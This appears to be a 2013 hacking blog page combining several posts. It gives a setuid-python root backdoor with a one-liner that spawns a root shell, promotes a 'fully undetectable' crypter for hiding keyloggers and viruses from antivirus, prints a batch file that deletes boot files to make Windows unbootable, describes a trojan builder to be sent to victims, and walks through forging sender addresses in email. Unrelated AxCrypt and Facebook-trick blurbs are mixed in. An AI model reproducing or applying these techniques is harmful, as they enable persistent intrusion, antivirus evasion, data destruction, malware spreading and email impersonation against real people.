Wednesday, October 30, 2013

Ok, I'm gonna teach you how to do something really sneaky that people don't usually look for to backdoor your roots so you can keep them. First make sure you have a few shells hidden so if you get locked out you can get back in.


(This is just a quick tutorial i ll post a HQ Detailed one soon)


Next you just want to

Command:-

chmod 4755 or chmod +s /usr/bin/py

Now, anytime you run python you will have root!

Command:-

python -c "z=__import__('os'); z.setuid(0); z.system('sh')"

or Just use a py connect-back shell and you'll have root.

DezCrypt FUD Crypter! (Fully undectable)





What Is Crypter?
Crypter is a  software used to hide our viruses, keyloggers or tools from antiviruses so that they are not detected by anti viruses. Thus, a crypter is a program that allow users to crypt the source code of their program to Bypass antivirus detection


What Does UD And FUD Mean?
UD means undetected, so only a few antivirus programs detect it. FUD means fully undetected, so no antivirus detects it

I have already given you a Free FUD Crypter which is outdated now, So today i will give you a free FUD Crypter (fully undetectable by anti viruses ) with which you can crypt any keyloggers or viruses





[Image: a.png]



The password of mediafire link is "dezired"

Download Link

Tuesday, October 29, 2013





Just copy the below code in notepad and save it as anyname.bat and when you open the file it will shutdown your computer and then you will not able to restart it

@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Atomic Virus Creator asks you to enter your personal preferences regarding:

Name of the virus
on startup Save viruses
HOMEDRIVE Save in
the Save in system32
Save on Desktop
Disable scheduled tasks
Create 10 users
Corrupt files the System
Open a Windows command 10
Start 10 times more annoying web pages
Restore midnight 
Use of Memory


These options determine the effectiveness of your virus. You can choose the desired options according to the damage you cause to the victim wants. Once you set your preferences, press ENTER and Virus Creator creates for you the trojan. Now, all you need created to do is send the virus to the victim and ask him to run the virus on your computer (Social Engineering). 
 

AxCrypt is the leading open source Windows file encryption software. It integrates seamlessly with Windows to compress, encrypt, decrypt, store, send and work with individual files.
Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.

Features
  • Password Protect any number of files using strong encryption.
  • Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows.
  • Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files.
  • Many additional features, but no configuration required. Just install it and use it.
  • AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt.
  • AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language.
AxCrypt is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation.
 
Step #1:   
Create a Facebook page using the “More” link in the left sidebar’s bottom. You can also land on any page and click on “Create page” button there.


Step #2:
Select any category depending upon what your page should be. The category doesn’t matter in this trick.


Step #3:
 The name part in the category page matters a lot in this trick. Now, you may need some special characters temporarily for creating the page. The below text box will help you to copy the special characters. Place the mouse pointer on the text box and press Ctrl + A. Now, Ctrl + C will copy all the text right here in the text box.

copy this


Paste the copied text on the category page of Facebook where you are now for creating a invisible page.
Step #4:

 Click on “I agree to Facebook Pages terms” and get started. Now, you will be taken to the page for adding description, website and page username. Input description for the page and also page’s username (recommended). Provide other details if you wish, else skip them all. You may add those details later too. 

Step #5:

 After landing into the page, go to Edit Page > Update Info. Click Edit button near the name field. now, place the insertion point on the starting of the text in the text box and hit delete key on your keyboard. 

Step #6:

 Click on Save Changes to save the page name. View the page to see for the changes. If the name change was not proper, you can see a symbol in the page activity section.
Most of the email forging tutorials1 on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program  which can be installed on your computer in few seconds.SMTP server allows you to send fake email right from your desktop easily and effectively. . This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.




PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1?
4. Set port to “25?
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP serverrunning on your own computer.This step is very important to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
Heres the snapshot of what you see after step 3. Click on it to enlarge
4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake emailappears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Thu Aug 5,2010 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data
<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)
*****END OF EMAIL FORGING****


DOWNLOAD LINK FOR SMTP SERVER

Subscribe to RSS Feed Follow me on Twitter!